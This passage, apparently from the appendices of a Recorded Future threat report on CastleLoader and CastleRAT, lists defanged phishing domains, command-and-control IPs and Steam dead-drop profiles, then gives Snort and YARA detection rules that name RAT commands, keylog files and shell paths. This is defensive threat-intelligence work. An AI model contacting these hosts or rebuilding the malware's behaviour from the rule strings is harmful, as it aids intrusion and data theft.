2025-10-22\r\nconfirmahotelastay[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-21\r\nconfirmahotelstay[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-23\r\nconfirmhotelestay[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-22\r\nconfirmhotelistay[.]com 185[.]39[.]19[.]181 2025-08-01 2025-10-16\r\nconfirmhotelystay[.]com 
185[.]39[.]19[.]180 2025-08-01 2025-10-23\r\nconfirmstayon[.]com 185[.]39[.]19[.]181 2025-07-29 2025-10-22\r\nconfirmstayonline[.]com 185[.]39[.]19[.]181 2025-07-29 2025-10-20\r\nconfirmyhotelstay[.]com 185[.]39[.]19[.]181 2025-08-01 2025-10-22\r\nguestaformahub[.]com 185[.]39[.]19[.]180 2025-07-30 2025-10-22\r\nguestaformhub[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\nguestaformsafe[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\nguestaportalverify[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\nguestaverifyportal[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-20\r\nguestformahub[.]com 185[.]39[.]19[.]180 2025-07-30 2025-10-23\r\nguestformasafe[.]com 185[.]39[.]19[.]180 2025-07-30 2025-10-21\r\nguestformhub[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-20\r\nguestformsafe[.]com 77[.]83[.]207[.]55 2025-07-28 2025-11-03\r\nguestformsafe[.]com 185[.]39[.]19[.]180 N/A N/A\r\nguestistayhotel[.]com 185[.]39[.]19[.]180 2025-08-02 2025-10-21\r\nguestportalverify[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-23\r\ngueststayhotel[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-22\r\nguestverifyhub[.]com 185[.]39[.]19[.]181 2025-07-28 2025-10-22\r\nguestverifylink[.]com 185[.]39[.]19[.]180 2025-07-28 2025-10-23\r\nguestverifyportal[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\nguestystayhotel[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-22\r\nguesutastayhotel[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-21\r\nguesytastayhotel[.]com 185[.]39[.]19[.]180 2025-08-02 2025-10-22\r\nhoteliguestverify[.]com 185[.]39[.]19[.]180 2025-07-31 2025-10-21\r\nhotelistayverify[.]com 185[.]39[.]19[.]180 2025-07-31 2025-10-21\r\nhotelyguestverify[.]com 185[.]39[.]19[.]181 2025-07-31 2025-10-22\r\nhotelystayverify[.]com 185[.]39[.]19[.]181 2025-07-31 2025-10-23\r\nnedpihotel[.]com 185[.]39[.]19[.]181 2025-07-29 
2025-10-22\r\npilolhotel[.]com 185[.]39[.]19[.]180 2025-07-29 2025-10-22\r\nroomiverifaccess[.]com 185[.]39[.]19[.]181 2025-08-02 2025-10-22\r\nroomverifaccess[.]com 185[.]39[.]19[.]181 2025-08-03 2025-10-23\r\nroomverifiaccess[.]com 185[.]39[.]19[.]181 2025-08-02 2025-10-22\r\nservicehotelonline[.]com 185[.]39[.]19[.]180 2025-08-03 2025-10-21\r\nverifihubguest[.]com 185[.]39[.]19[.]180 2025-07-28 2025-10-22\r\nverifyhubguest[.]com 185[.]39[.]19[.]181 2025-07-28 2025-10-22\r\n(Source: Recorded Future)\r\nAppendix E: Additional Domains Referenced by the Phishing Email Management Tooling\r\nDomain IP Address First Seen Last Seen Notes\r\ndok-ol[.]com 185[.]39[.]19[.]180 2025-07-27 2025-07-28 N/A\r\ndok-ol[.]com 185[.]39[.]19[.]181 2025-07-28 2025-11-10 N/A\r\ncik-ed[.]com 185[.]39[.]19[.]181 2025-07-28 2025-11-09 N/A\r\nfor-es[.]com 77[.]83[.]207[.]55 2025-07-25 2025-11-03 Found via Google\r\nkil-it[.]com 185[.]39[.]19[.]180 2025-06-29 2025-11-07 Found via Google\r\nkip-er[.]com 77[.]83[.]207[.]55 2025-07-11 2025-11-09 Found via Google\r\nxut-uv[.]com 77[.]83[.]207[.]55 2025-07-20 2025-11-08 Found via Google\r\neta-cd[.]com 185[.]39[.]19[.]180 2025-07-22 2025-11-08 Found via Google\r\nuki-fa[.]com 77[.]83[.]207[.]55 2025-07-22 2025-11-07 Found via Google\r\nned-uj[.]com 185[.]39[.]19[.]180 2025-07-10 2025-11-05 Found via Google\r\neto-sa[.]com 77[.]83[.]207[.]55 2025-06-25 2025-11-09 Found via Google\r\nwal-ik[.]com 77[.]83[.]207[.]55 2025-07-10 2025-11-09 Found via Google\r\nmac-ig[.]com 77[.]83[.]207[.]55 2025-07-20 2025-11-09 Found via Google\r\nmap-nv[.]com 77[.]83[.]207[.]55 2025-07-11 2025-11-06 Found via Google\r\nipk-sa[.]com 77[.]83[.]207[.]55 2025-07-18 2025-11-06 Found via Google\r\nher-op[.]com 185[.]39[.]19[.]180 2025-06-24 2025-06-24 Domain used in “Completed processing task” log, per the DOM\r\nher-op[.]com 77[.]83[.]207[.]55 2025-06-25 2025-06-25 Domain used in “Completed processing task” log, per the DOM\r\n(Source: Recorded Future)\r\nAppendix F: Steam Community Profiles and their Corresponding C2 Domains, alongside the IP Addresses that Hosted the C2 domains\r\nSteam Community Profile Link | C2 Domain | IP Address\r\nhxxps://steamcommunity[.]com/id/tfy5d6gohu8tgy687r7 | tdbfvgwe456yt[.]com, miteamss[.]com | 45[.]134[.]26[.]41, 91[.]202[.]233[.]132, 91[.]202[.]233[.]250\r\nhxxps://steamcommunity[.]com/id/desdsfds34324y3g | gabesworld[.]com, autryjones[.]com | 194[.]76[.]227[.]242, 46[.]28[.]67[.]22, 195[.]211[.]97[.]51\r\nhxxps://steamcommunity[.]com/id/fio34h8dsh3iufs | treetankists[.]com | 45[.]11[.]181[.]59\r\nhxxps://steamcommunity[.]com/id/jeg238r7staf378s | kakapupuneww[.]com | 45[.]135[.]232[.]149\r\nhxxps://steamcommunity[.]com/id/krouvhsin34287f7h3 | justnewdmain[.]com, programsbookss[.]com | 192[.]109[.]138[.]102, 185[.]208[.]158[.]250, 178[.]17[.]57[.]102, 64[.]52[.]80[.]121, 45[.]32[.]69[.]11, 67[.]217[.]228[.]198, 192[.]153[.]57[.]125\r\n(Source: Recorded Future)\r\nAppendix G: Cluster 3 Booking.com-Themed Domains Identified by Pivoting from boiksal[.]com\r\nDomain IP Address First Seen Last Seen\r\nbioskbd[.]com 178[.]17[.]57[.]103 2025-09-23 2025-09-29\r\nblkiesf[.]com Cloudflare 2025-09-25 2025-10-22\r\nboikfrs[.]com 178[.]17[.]57[.]103 2025-09-22 2025-09-29\r\nboiksal[.]com 178[.]17[.]57[.]103 2025-09-04 2025-09-10\r\nbookingnewprice109034[.]icu Cloudflare 2025-10-06 2025-10-21\r\nbookingnewprice204167[.]icu Cloudflare 2025-10-06 
2025-10-20\r\nguest-request16433[.]com Cloudflare 2025-10-06 2025-10-21\r\nguest-request44565494[.]com 178[.]17[.]57[.]103 2025-09-05 2025-09-07\r\nguest-request64533[.]com 178[.]17[.]57[.]103 2025-10-06 2025-10-21\r\nguest-request666543[.]com Cloudflare 2025-10-06 2025-10-22\r\nguest-request677653[.]com Cloudflare 2025-10-06 2025-10-21\r\nguest-update666532345[.]com Cloudflare 2025-10-06 2025-10-21\r\nhotelroomprice1039375[.]icu Cloudflare 2025-10-06 2025-10-22\r\ninfo-guest44567645[.]com Cloudflare 2025-08-28 2025-09-03\r\ninfo676345677[.]com Cloudflare 2025-10-06 2025-10-21\r\nnewmessage10294[.]com Cloudflare 2025-10-09 2025-10-22\r\nrequest-info3444[.]com Cloudflare 2025-09-15 2025-09-21\r\nrequest-info4433345[.]com Cloudflare 2025-10-06 2025-10-21\r\nrequest345553[.]com Cloudflare 2025-09-15 2025-09-22\r\nrequest44456776[.]com Cloudflare 2025-10-06 2025-10-22\r\nupdate-gues3429[.]com Cloudflare 2025-09-15 2025-09-21\r\nupdate-guest4398317809[.]com Cloudflare 2025-09-14 2025-09-17\r\nupdate-info14546[.]com Cloudflare 2025-10-06 2025-10-21\r\nupdate-info3458421[.]com Cloudflare 2025-09-25 2025-10-21\r\nupdate-info4467[.]com Cloudflare 2025-10-06 2025-10-21\r\nupdate-info4468765[.]com Cloudflare 2025-08-25 2025-09-03\r\nupdate-info539156[.]com Cloudflare 2025-08-24 2025-09-02\r\nupdate-info71556[.]com Cloudflare 2025-08-28 2025-09-03\r\nupdate-reques898665[.]com Cloudflare 2025-08-21 2025-09-02\r\n(Source: Recorded Future)\r\nAppendix H: Indicators of Compromise (IoCs)\r\nCastleRAT C2 IP 
Addresses:\r\n5[.]35[.]44[.]176\r\n34[.]72[.]90[.]40\r\n45[.]11[.]180[.]174\r\n45[.]11[.]180[.]198\r\n45[.]11[.]181[.]59\r\n45[.]32[.]69[.]11\r\n45[.]61[.]136[.]81\r\n45[.]134[.]26[.]41\r\n45[.]135[.]232[.]149\r\n45[.]144[.]53[.]62\r\n46[.]28[.]67[.]22\r\n64[.]52[.]80[.]121\r\n66[.]63[.]187[.]224\r\n67[.]217[.]228[.]198\r\n77[.]90[.]153[.]43\r\n77[.]238[.]241[.]203\r\n79[.]132[.]130[.]148\r\n79[.]132[.]131[.]200\r\n85[.]192[.]49[.]6\r\n85[.]208[.]84[.]115\r\n87[.]120[.]93[.]167\r\n91[.]202[.]233[.]132\r\n91[.]202[.]233[.]250\r\n94[.]141[.]122[.]164\r\n102[.]135[.]95[.]102\r\n104[.]225[.]129[.]171\r\n144[.]208[.]126[.]50\r\n168[.]100[.]8[.]84\r\n178[.]17[.]57[.]102\r\n178[.]17[.]57[.]153\r\n185[.]125[.]50[.]125\r\n185[.]149[.]146[.]118\r\n185[.]156[.]248[.]24\r\n185[.]196[.]9[.]80\r\n185[.]196[.]9[.]222\r\n185[.]196[.]10[.]8\r\n185[.]196[.]11[.]171\r\n185[.]208[.]158[.]250\r\n192[.]109[.]138[.]102\r\n192[.]153[.]57[.]125\r\n194[.]76[.]227[.]242\r\n195[.]85[.]115[.]44\r\n195[.]149[.]146[.]118\r\n195[.]201[.]108[.]189\r\n195[.]211[.]97[.]51\r\nCastleRAT C2 Domains:\r\nautryjones[.]com\r\ngabesworld[.]com\r\njustnewdmain[.]com\r\nkakapupuneww[.]com\r\nmiteamss[.]com\r\nprogramsbookss[.]com\r\ntdbfvgwe456yt[.]com\r\ntreetankists[.]com\r\nSteam Community URLs:\r\nhxxps[://]steamcommunity[.]com/id/desdsfds34324y3g\r\nhxxps[://]steamcommunity[.]com/id/fio34h8dsh3iufs\r\nhxxps[://]steamcommunity[.]com/id/jeg238r7staf378s\r\nhxxps[://]steamcommunity[.]com/id/krouvhsin34287f7h3\r\nhxxps[://]steamcommunity[.]com/id/tfy5d6gohu8tgy687r7\r\nCastleLoader C2 IP Addresses:\r\n31[.]58[.]50[.]160\r\n31[.]58[.]87[.]132\r\n45[.]11[.]183[.]19\r\n45[.]11[.]183[.]45\r\n45[.]11[.]183[.]165\r\n45[.]155[.]249[.]121\r\n80[.]77[.]25[.]88\r\n80[.]77[.]25[.]114\r\n80[.]77[.]25[.]239\r\n107[.]158[.]128[.]26\r\n147[.]45[.]177[.]127\r\n170[.]130[.]165[.]201\r\n172[.]86[.]90[.]58\r\n173[.]44[.]141[.]52\r\n185[.]121[.]234[.]141\r\nCastleLoader C2 Domains:\r\nalafair[.]net\r\nanotherproject[.]icu\r\nbethschwier[.]com\r\ncampanyasoft[.]com\r\ncastlppwnd[.]com\r\ndonttouchme[.]life\r\ndonttouchthisisuseless[.]icu\r\ndoyoureallyseeme[.]icu\r\ndpeformse[.]com\r\nicantseeyou[.]icu\r\noldspicenotsogood[.]shop\r\nrcpeformse[.]com\r\nroject0[.]com\r\nspeatly[.]com\r\ntouchmeplease[.]icu\r\nwereatwar[.]com\r\nAdditional Domains:\r\nalbafood[.]shop\r\nalbalk[.]lol\r\nbdeskthebest[.]shop\r\nbestproxysale[.]shop\r\nbestvpninfo[.]shop\r\nchessinthenight[.]lol\r\nclgenetics[.]shop\r\ndocusign[.]homes\r\ndubaialbafood[.]shop\r\neasyadvicesforyou[.]shop\r\neasyprintscreen[.]shop\r\nfunjobcollins[.]shop\r\nnort-secure[.]shop\r\nnorton-secure[.]shop\r\nnotstablecoin[.]xyz\r\nnotusdt[.]lol\r\nnvidblog[.]shop\r\nnvldlainfoblog[.]shop\r\noldspicenotsogood[.]shop\r\nstarkforeveryone[.]lol\r\nsweetdevices[.]lol\r\ntestdomain123123[.]shop\r\ntradeviewdesktop[.]shop\r\ntradlngview-desktop[.]biz\r\ntradlngvlewdesktop[.]shop\r\ntradview-desktop[.]shop\r\nvipcinemade[.]shop\r\nvipcinemadubai[.]shop\r\nvipdubaicinema[.]shop\r\nCluster 1 (TAG-160) Logistics-Themed Domains:\r\ncdlfreightlogistics[.]com\r\ndperforms[.]info\r\nenglandloglstics[.]com\r\nenglanglogistlcs[.]com\r\nhometownlogisticsllc[.]com\r\nleemanlogisticsinc[.]com\r\nloadplannig[.]com\r\nloads[.]icu\r\nloadsplanning[.]com\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 29 of 
39\n\nloadsschedule[.]com\r\nloadstracking[.]com\r\nloadstrucking[.]com\r\nmcentireinc[.]com\r\nmcloads[.]com\r\nmlxfreightinc[.]com\r\nmrlogsol[.]ca\r\npinaccletruckllc[.]com\r\nrateconfirmations[.]com\r\nredlightninglogistics[.]com\r\nredlightninglogisticsinc[.]com\r\nstarshiplogisticsgroupllc[.]com\r\ntenderloads[.]com\r\ntrucksscheduling[.]com\r\nCluster 1 (TAG-160) IP Addresses Hosting Logistics-Themed Domains:\r\n74[.]119[.]239[.]234\r\n78[.]153[.]155[.]131\r\n162[.]215[.]230[.]96\r\n162[.]215[.]230[.]150\r\n162[.]215[.]241[.]46\r\n162[.]215[.]241[.]215\r\n162[.]251[.]80[.]108\r\n185[.]236[.]20[.]154\r\n192[.]124[.]178[.]74\r\n199[.]79[.]62[.]141\r\n204[.]11[.]58[.]80\r\n207[.]174[.]212[.]141\r\nMatanbuchus C2 IP Addresses:\r\n185[.]39[.]19[.]164\r\nMatanbuchus C2 Domains:\r\ngalaxioflow[.]com\r\nmechiraz[.]com\r\nnicewk[.]com\r\nnimbusvaults[.]com\r\nCluster 2 (TAG-161) Booking.com-Themed Domains:\r\ncheckinastayverify[.]com\r\ncheckinistayverify[.]com\r\ncheckinstayverify[.]com\r\ncheckistayverify[.]com\r\nchecksstayverify[.]com\r\ncheckystayverify[.]com\r\nconfirmahotelastay[.]com\r\nconfirmahotelstay[.]com\r\nconfirmhotelestay[.]com\r\nconfirmhotelistay[.]com\r\nconfirmhotelystay[.]com\r\nconfirmstayon[.]com\r\nconfirmstayonline[.]com\r\nconfirmyhotelstay[.]com\r\nguestaformahub[.]com\r\nguestaformhub[.]com\r\nguestaformsafe[.]com\r\nguestaportalverify[.]com\r\nguestaverifyportal[.]com\r\nguestformahub[.]com\r\nguestformasafe[.]com\r\nguestformhub[.]com\r\nguestformsafe[.]com\r\nguestistayhotel[.]com\r\nguestportalverify[.]com\r\ngueststayhotel[.]com\r\nguestverifyhub[.]com\r\nguestverifylink[.]com\r\nguestverifyportal[.]com\r\nguestystayhotel[.]com\r\nguesutastayhotel[.]com\r\nguesytastayhotel[.]com\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 30 of 
39\n\nhoteliguestverify[.]com\r\nhotelistayverify[.]com\r\nhotelyguestverify[.]com\r\nhotelystayverify[.]com\r\nnedpihotel[.]com\r\npilolhotel[.]com\r\nroomiverifaccess[.]com\r\nroomverifaccess[.]com\r\nroomverifiaccess[.]com\r\nservicehotelonline[.]com\r\nverifihubguest[.]com\r\nverifyhubguest[.]com\r\nCluster 2 (TAG-161) IP Addresses Hosting Booking.com-Themed Domains:\r\n77[.]83[.]207[.]55\r\n185[.]39[.]19[.]180\r\n185[.]39[.]19[.]181\r\nOther Domains Linked to Cluster 2 (TAG-161):\r\ncik-ed[.]com\r\ncut-gv[.]com\r\ndip-bo[.]com\r\ndok-ol[.]com\r\ndut-cd[.]com\r\neta-cd[.]com\r\neto-sa[.]com\r\nfir-vp[.]com\r\nfor-es[.]com\r\ngir-vc[.]com\r\ngut-bk[.]com\r\nher-op[.]com\r\nipk-sa[.]com\r\nitp-ce[.]com\r\nkil-it[.]com\r\nkip-er[.]com\r\nmac-ig[.]com\r\nmap-nv[.]com\r\nned-uj[.]com\r\notr-gl[.]com\r\npit-kp[.]com\r\nrol-vd[.]com\r\nsite-bila[.]com\r\nsite-here[.]com\r\nsite-reto[.]com\r\nsite-tilo[.]com\r\nsite-wila[.]com\r\nspu-cr[.]com\r\ntam-cg[.]com\r\nuke-sd[.]com\r\nuki-fa[.]com\r\nwal-ik[.]com\r\nxut-uv[.]com\r\nxyt-ko[.]com\r\nykl-vh[.]com\r\nyt-ko[.]com\r\nzit-fl[.]com\r\nProxy IP Addresses Linked to Cluster 2 (TAG-161):\r\n109[.]104[.]153[.]29\r\n109[.]104[.]153[.]100\r\n109[.]104[.]153[.]193\r\n109[.]104[.]154[.]67\r\nAdditional IP Addresses Linked to Phishing Email Management Tooling:\r\n80[.]64[.]18[.]245\r\n85[.]208[.]84[.]65\r\n88[.]214[.]50[.]83\r\n185[.]39[.]19[.]94\r\nCluster 3 Booking.com-Themed Domains:\r\nbioskbd[.]com\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 31 of 
39\n\nblkiesf[.]com\r\nboikfrs[.]com\r\nboiksal[.]com\r\nbookingnewprice109034[.]icu\r\nbookingnewprice204167[.]icu\r\nguest-request16433[.]com\r\nguest-request44565494[.]com\r\nguest-request64533[.]com\r\nguest-request666543[.]com\r\nguest-request677653[.]com\r\nguest-update666532345[.]com\r\nhotelroomprice1039375[.]icu\r\ninfo-guest44567645[.]com\r\ninfo676345677[.]com\r\njustnewdmain[.]com\r\nnewmessage10294[.]com\r\nprogramsbookss[.]com\r\nrequest-info3444[.]com\r\nrequest-info4433345[.]com\r\nrequest345553[.]com\r\nrequest44456776[.]com\r\nupdate-gues3429[.]com\r\nupdate-guest4398317809[.]com\r\nupdate-info14546[.]com\r\nupdate-info3458421[.]com\r\nupdate-info4467[.]com\r\nupdate-info4468765[.]com\r\nupdate-info539156[.]com\r\nupdate-info71556[.]com\r\nupdate-reques898665[.]com\r\nCluster 3 IP Addresses Hosting Booking.com-Themed Domains:\r\n178[.]17[.]57[.]103\r\n192[.]109[.]138[.]102\r\nAppendix I: Snort Rules for CastleLoader\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleLoader Malware Outbound Checkin\"; flow:established,to_server; content:\"GET\"; http_method;\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleLoader Malware Outbound Payload Request\"; flow:established,to_server; content:\"GET\"; http_m\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleLoader Malware Stager Outbound Payload Request\"; flow:established,to_server; content:\"GET\"\r\nalert tcp $EXTERNAL_NET 79 -\u003e $HOME_NET any (msg:\"CastleLoader Malware Inbound Command Retrieval via Finger Service\"; flow:established,to_client; co\r\nAppendix J: Snort Rules for CastleRAT\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 32 of 39\n\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware 
Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"Possible CastleRAT Python Malware Outbound Request To IP Geo Location Service ip-api\"; flow:esta\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api\"; flow:e\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api\"; flow:e\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api\"; flow:e\r\nAppendix K: Snort Rules for Matanbuchus\r\nalert udp $EXTERNAL_NET any -\u003e $HOME_NET any (msg:\"Matanbuchus Loader Inbound DNS Tunneled Data ACK\"; content:\"|AA 
AA 85 80 00 01 00 01 00 00 00 00\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"Matanbuchus Loader Malware Outbound C2 Communication\"; flow:established,to_server; content:\"POST|\r\nAppendix L: Yara Rule for CastleLoader\r\nrule MAL_CastleLoader {\r\n meta:\r\n author = \"Insikt Group, Recorded Future\"\r\n date = \"2025-08-06\"\r\n description = \"Detection of the CastleLoader malware executable\"\r\n version = \"1.0\"\r\n reference = \"https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation\"\r\n hash = \"1b6befc65b19a63b4131ce5bcc6e8c0552fe1e1d136ab94bc7d81b3924056156\"\r\n hash = \"202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04\"\r\n hash = \"25e0008aba82690e0f58c9d9fcfbc5d49820aa78d2f7bfcd0b85fb969180fc04\"\r\n hash = \"b45cce4ede6ffb7b6f28f75a0cbb60e65592840d98dcb63155b9fa0324a88be2\"\r\n hash = \"fb9de7448e9e30f717c171f1d1c90ac72828803a16ad385757aeecc853479d3c\"\r\n hash = \"6444f0e3f78254aef663837562d258a2236a77f810ee8d832de7d83e0fdd5783\"\r\n malware = \"CastleLoader\"\r\n malware_id = \"8RF9P9\"\r\n category = \"MALWARE\"\r\n strings:\r\n $vmware_check = { 3D 56 4D 77 61 75 ?? 81 7D F8 72 65 56 4D 0F 85 ?? ?? ?? ?? 
81 7D F4 77 61 72 65 }\r\n $api_hashing = { 0F BE 0C 1E 8B C2 F6 C3 01 75 0F C1 E8 03 0F AF C1 8B CA C1 E1 07 33 C1 }\r\n $stack_str_url = { C7 ?5 [1-4] 74 00 74 00 C7 ?5 [1-4] 69 00 6E 00 C7 ?5 [1-4] 67 00 73 00 }\r\n $mov_edx_apihash1 = { BA 44 A0 2D 39 } // CreateMutexW\r\n $mov_edx_apihash2 = { BA 2B C2 86 58 } // GetLastError\r\n $mov_edx_apihash3 = { BA 94 F9 86 F8 } // RtlAllocateHeap\r\n $mov_edx_apihash4 = { BA B2 48 70 60 } // ExitProcess\r\n condition:\r\n uint16(0) == 0x5A4D and all of them\r\n}\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 33 of 39\n\nAppendix M: Yara Rules for CastleRAT\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 34 of 39\n\nrule MAL_CastleRAT_Python {\r\n meta:\r\n author = \"Insikt Group, Recorded Future\"\r\n date = \"2025-08-18\"\r\n description = \"Detection of the python variant of CastleRAT malware\"\r\n version = \"1.0\"\r\n reference = \"https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations\"\r\n reference = \"https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation\"\r\n reference = \"https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview\"\r\n hash = \"94dc0f696a46f3c225b0aa741fbd3b8997a92126d66d7bc7c9dd8097af0de52a\"\r\n hash = \"53775af67e9df206ed3f9c0a3756dbbc4968a77b1df164e9baddb51e61ac82df\"\r\n malware = \"CastleRAT\"\r\n malware_id = \"9WCga-\"\r\n category = \"MALWARE\"\r\n actor = \"TAG-150\"\r\n actor_id = \"9nk6DO\"\r\n strings:\r\n $cmd1 = \"S_CONNECT\" fullword\r\n $cmd2 = \"S_COMMAND\" fullword\r\n $cmd3 = \"S_PING\" fullword\r\n $cmd4 = \"S_CMD\" fullword\r\n $cmd5 = \"S_DELETE\" fullword\r\n $cmd6 = \"S_POWERSHELL\" fullword\r\n $cmd7 = \"S_START_TERMINAL\" fullword\r\n $cmd8 = \"S_SESSION_MESSAGE\" fullword\r\n $cmd9 = \"S_UPLOAD\" fullword\r\n $fun1 = 
\"CheckElevation():\" fullword\r\n $fun2 = \"GetHWID(\"\r\n $fun3 = \"GetOS(\"\r\n $fun4 = \"GetIpGeo(\"\r\n $fun5 = \"rc4createkeyA(\"\r\n $fun6 = \"EncryptDecryptBufA(\"\r\n $fun7 = \"RecvTimeout(\"\r\n $fun8 = \"Send(\"\r\n $fun9 = \"Connect(\"\r\n $fun10 = \"ThreadPing(\"\r\n $fun11 = \"ThreadRecvTerminal(\"\r\n $fun12 = \"ThreadTerminalSession(\"\r\n $fun13 = \"ThreadUploadFile(\"\r\n $fun14 = \"SelfDelete()\" fullword\r\n condition:\r\n filesize \u003c 50KB and\r\n 7 of ($cmd*) and\r\n 10 of ($fun*)\r\n}\r\nrule MAL_CastleRAT_C {\r\n meta:\r\n author = \"Insikt Group, Recorded Future\"\r\n date = \"2025-08-18\"\r\n description = \"Detection of the C variant of CastleRAT malware\"\r\n version = \"2.0\"\r\n reference = \"https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations\"\r\n reference = \"https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation\"\r\n reference = \"https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview\"\r\n hash = \"1ff6ee23b4cd9ac90ee569067b9e649c76dafac234761706724ae0c1943e4a75\"\r\n hash = \"e6bcdf375649a7cbf092fcab65a24d832d8725d833e422e28dfa634498b00928\"\r\n hash = \"67cf6d5332078ff021865d5fef6dc61e90b89bc411d8344754247ccd194ff65b\"\r\n hash = \"963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d\"\r\n hash = \"60125159523c356d711ffa1076211359906e6283e25f75f4cf0f9dc8da6bf7b0\"\r\n hash = \"cf202498b85e6f0ae4dffae1a65acbfec78cc39fce71f831d45f916c7dedfa0c\"\r\n malware = \"CastleRAT\"\r\n malware_id = \"9WCga-\"\r\n category = \"MALWARE\"\r\n actor = \"TAG-150\"\r\n actor_id = \"9nk6DO\"\r\n strings:\r\n $log_tag1 = \"clipboardlog.txt\" fullword wide\r\n $log_tag2 = \"keylog.txt\" fullword wide\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 35 of 39\n\n$wnd_class1 = \"IsabellaWine\" fullword wide\r\n $wnd_class2 = \"camera!\" fullword wide\r\n $log_fmt1 
= \"[%02d:%02d %02d.%02d.%02d] %ws\" fullword wide\r\n $log_fmt2 = \"[%02d:%02d %02d.%02d.%02d] \" fullword wide\r\n $log_fmt3 = \"[%02d.%02d.%02d %02d:%02d] \" fullword wide\r\n $s1 = \"(VPN)\" wide ascii\r\n $s2 = \"rundll32 \\\"C:\\\\Windows\\\\System32\\\\shell32.dll\\\" #61\" wide\r\n $s3 = \"\\\"%ws\\\" -no-deelevate\" fullword wide\r\n $s4 = \"IsWindowVisible\" fullword ascii\r\n $s5 = \"UAC_InputIndicatorOverlayWnd\" fullword wide\r\n $s6 = \"www.ip-api.com\" fullword wide\r\n $s7 = \"MachineGuid\" fullword wide\r\n $s8 = \"line/?fields=\" wide\r\n $s9 = \"C:\\\\Windows\\\\System32\\\\cmd.exe\" wide\r\n $s10 = \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\" fullword wide\r\n condition:\r\n uint16(0) == 0x5a4d and\r\n any of ($log_tag*) and\r\n any of ($wnd_class*) and\r\n any of ($log_fmt*) and\r\n all of ($s*)\r\n}\r\nrule MAL_CastleRAT_Shellcode_Loader {\r\n meta:\r\n author = \"Insikt Group, Recorded Future\"\r\n date = \"2025-10-20\"\r\n description = \"Detection of a python based shellcode loader that runs CastleRAT malware\"\r\n version = \"1.0\"\r\n reference = \"https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations\"\r\n hash = \"058d83fd8834246d6d2a2771e6e0aeb4d4ef8a6984cbe1133f3a569029a4b1f7\"\r\n hash = \"190e673787bfc6e8eeebccd64c8da61747d5be06f87d3aea879118ef1a9f4836\"\r\n malware = \"CastleRAT\"\r\n actor = \"TAG-150\"\r\n actor_id = \"9nk6DO\"\r\n category = \"MALWARE\"\r\n malware_id = 